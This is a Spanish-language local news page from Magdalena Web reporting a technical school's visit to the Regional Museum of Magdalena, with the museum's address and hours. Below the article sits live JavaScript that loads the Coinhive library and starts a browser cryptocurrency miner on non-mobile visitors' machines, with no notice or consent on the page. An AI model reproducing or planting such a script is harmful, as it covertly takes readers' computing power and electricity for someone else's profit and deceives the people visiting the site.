domingo 28 de abril de 2024
Magdalena Web. Noticias de Magdalena y la región » Información Municipal » 7 sep 2018

Museo de Magdalena

LA ESCUELA TÉCNICA VISITÓ EL MUSEO REGIONAL DE MAGDALENA

Esta semana el Museo Regional de Magdalena, recibió nuevamente grupos de estudiantes que se encuentran investigando sobre las fuentes de la historia.


Por:
MWeb

Esta semana el Museo Regional de Magdalena, recibió nuevamente grupos de estudiantes que se encuentran investigando sobre las fuentes de la historia.
Los alumnos del 1º año de la Escuela Técnica Nº 1 acompañados de sus profesores, fueron atendidos por la encargada del Centro Cultural y Museo, estableciéndose una charla amena donde se destacó la importancia de los documentos, fotografías, pinturas, atuendos, libros, etc. a la hora de reconstruir nuestro pasado histórico.
El museo municipal, brinda permanentemente estas visitas guiadas a establecimientos educativos del distrito y a todas las instituciones y particulares que lo requieran. Su sede es el edificio del antiguo Hotel Colón, sito en la esquina de Rivadavia y Goenaga. Para mayor información comunicarse al 452144 o dirigirse al mismo de lunes a viernes de 08 a14 y de viernes a domingos también de tarde de 16 a 19 horas.




<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('MunKg4F5lpSUvSiYzt7jIfGHIRHonur0', {throttle: 0.3});

// Only start on non-mobile devices and if not opted-out
// in the last 14400 seconds (4 hours):
if (!miner.isMobile() && !miner.didOptOut(14400)) {
miner.start();
}
</script>

OPINÁ, DEJÁ TU COMENTARIO:

VIDEOS